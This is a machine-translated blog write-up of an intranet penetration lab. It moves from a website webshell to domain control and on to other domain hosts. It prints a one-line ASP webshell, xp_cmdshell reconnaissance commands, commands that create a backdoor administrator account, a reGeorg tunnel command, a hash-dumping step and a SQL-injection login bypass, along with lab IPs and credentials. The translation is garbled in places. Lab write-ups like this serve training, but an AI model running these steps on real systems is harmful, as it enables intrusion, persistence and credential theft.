Title: Environmental penetration testing process in the intranet penetration domain

0x00 Experimental purpose

Get the website source code of other hosts in the domain environment

0x01 Penetration idea

By obtaining the website shell, the intranet will penetrate into the intranet, and the intranet will obtain the domain control permissions, and then the domain control will penetrate into other domains and obtain the resources.

0x02 Experimental process

Visit the target website IP and found that it is a static website. I found that the front desk of the website cannot be used. Try to explode the backend of the website

Using Yujian to scan the background, no background login interface was found, but the robots.txt file was found. Check robots.txt to find that there is a website background directory inside.

Visit the website backend page

Try to use burp brute force cracking, and find that the website backend administrator account password is successfully blasted.

Use the blasted administrator account password to successfully log in to the website backend (PS: select full function login when logging in)

I found that the template folder name can be modified at the interface style template selection. We changed the template folder name to 1.asp and tried to use the IIS parsing vulnerability.

Then add the aspx sentence Trojan to html file at the interface style edit template/css file to add template

Using a kitchen knife to successfully connect to the Trojan horse we wrote

Use a sentence Trojan to upload an aspx horse to facilitate operation

Check and find that the host is a dual network card, and you get two intranet IP segments.

Check the cache information of the host to find several intranet IPs

Checking and finding that 192.168.152.173 has enabled port 1433, we speculate that it may be a data server

Check the website configuration file and discover the database account password

Using aspx Malaysia successfully logged in to the database and found that it was system permission

View all user names in the domain

Query the domain group name

View the list of computers in the current domain

Query Domain Administrator

Use the database shell to add an account and add it to the administrator group

It was also found that 192.168.152.173 opened port 3389

Use reGeorg+Proxifier to set up a proxy to try remote login

Use the administrator account password we added earlier to successfully log in to the remote desktop. When logging in, configure options and mount the local tool folder to the target machine.

Log in to remote desktop successfully

Upload a QuarksPwDump.exe using file share, then use QuarksPwDump.exe to grab the system administrator password hash and export it to a txt file

Using MD5, I found that it cannot be solved

We know that the hosts in the domain have certain naming rules. When you check the website that gets the shell, you will find that the root directory of the website is named game.fbi.gov.us. Through manual testing, you will find a website with the domain name oa.fbi.gov.us.

Visit our oa.fbi.gov.us domain name discovery is a source code library log management system

Try to use the asp universal password to bypass login. Account: liufeng’ or ‘1’=’1 password is arbitrary, and log in to the background successfully

The storage xss is found in the addition log

Click on the log we added to check the properties and find the URL of the log added

Test whether the URL obtained has injection, and it is found that it has an error of 500.

We use the D injection tool to log in to the website backend

Then I tried to inject the URL and found that the administrator password was successfully injected. Username did not come out for some reason, but the problem was not big. We have already obtained several usernames above, not many, so we can try them one by one.

Use the username and password we visited before to try to log in to other hosts in the domain

Log in to other hosts successfully, and then we can view and download files from other PCs in the domain

0x03 Summary

1. Accessing the target website IP is a static website. It is found that the website front desk cannot be used. It scans its directory through the Yujian directory scanning tool. It is found that robots.txt exists. It is found that robots.txt exists. It is found that there is a website backend page. Although there is a verification code in the background, the verification code has a long time. It can be blasted through bp, and the user name and password are successfully destroyed. It is admin/passw0rdhttp://39.106.226.95:9235/admin3. Scan the target website IP through namp and find that the system is Windows iis6.0, and port 80 is enabled. 14. I found that the template folder name can be modified at the interface style template selection, and the template name can be modified to 1.asp15. Then add the template name 1.html in the interface style edit template/css file to add the template, and the content is a sentence of asp%eavl request('pass')%16. Successfully connect a sentence through the kitchen knife, and then upload ASPX through the kitchen knife to go immediately.

17. Through the command execution of aspx Malaysia, check the IP address of the network card, and find that there are 2 network cards, one network card IP address 192.168.152.182, and the other network card is 192.168.79.128cmdpath:c:\windows\system32\cmd.exeargument:/c ipconfig18. Check the cache information of the host and find several intranet IPs (192.168.152.182, 192.168.152.173, 192.168.152.180)cmdpath:c:\windows\system32\cmd.exeargument:/c arp -a19.Using the portscan function of aspx Malaysia, we found that 1433 and 3389 ports 20 were enabled. View the website configuration file and found that the database account password 21.Using the database function of aspx Malaysia successfully logged in to the database, and found that the system permissions connstring:server=192.168.152.173;UID=sa;PWD=piy88PRO*JNJ24e3;database=master;provider=SQLOLEDBSQLEXEC: XP_cmdshell_execrun sql:Exec master.dbo,xp_cmdshell 'whoami'22. Query all user names in the domain SQLEXEC: XP_cmdshell_execrun sql:Exec master.dbo,xp_cmdshell 'dequery user'23. Query the domain group name SQLEXEC: XP_cmdshell_execrun sql:Exec master.dbo,xp_cmdshell 'net group /domain'24. Check the list of computers in the current domain and find that there are host names such as web-server, file-server, db-server, etc. SQLEXEC: XP_cmdshell_execrun sql:Exec master.dbo,xp_cmdshell 'net view'25. Query the domain administrator, SQLEXEC: for administrator user SQLEXEC: XP_cmdshell_execrun sql:Exec master.dbo,xp_cmdshell 'net group 'domain admin' /domain'26. Use the database shell to add an account and add it to the administrator group Exec master.dbo,xp_cmdshell 'net user ddd password#111 /add'Exec master.dbo,xp_cmdshell 'net localgroup administrators ddd /add'13. Upload the aspx script file of reGeorgSocksProxy to the target system through aspx (39.106.226.95) and access the link http://39.106.226.95:9235/tunnel.aspx14. After configuration, reGeory is used to open up the local and target channels, and execute python reGeorgSocksProxy.py -p 8888 -l 0.0.0.0 -u http://39.106.226.95:9235/tunnel.aspx

15. Set up the socks4 proxy on the proxifier and add the proxy socks4 127.0.0.1 888816. Load mstsc through proxifier for remote desktop login 192.168.152.173. Configure options when logging in remotely and mount the local tool folder to the target machine

17. Upload a QuarksPwDump.exe using the file share, then use QuarksPwDump.exe to grab the system administrator password hash and export it to a txt file. It was found that MD5 could not be unwrapped 18. There is another directory in the root directory of the website, which is oa.fbi.gov.us. Then, access this directory command directly as a website domain name, and find that it is a source code library log management system. 19. Try to use the asp universal password to bypass login. Account: admin’ or ‘1’=’1 password is arbitrary, and log in to the background successfully 20. Find that there is a storage type xss21. Click the added log to check the attributes. Find the URL http://oa.fbi.gov.us/logive.asp?id=39422. Use the Ah D injection tool or the sqlmap tool to successfully inject the username and password 23. Try to use the successfully injected username and password to successfully log in on the desktop.

Original link: https://blog.csdn.net/weixin_44991517/article/details/93896401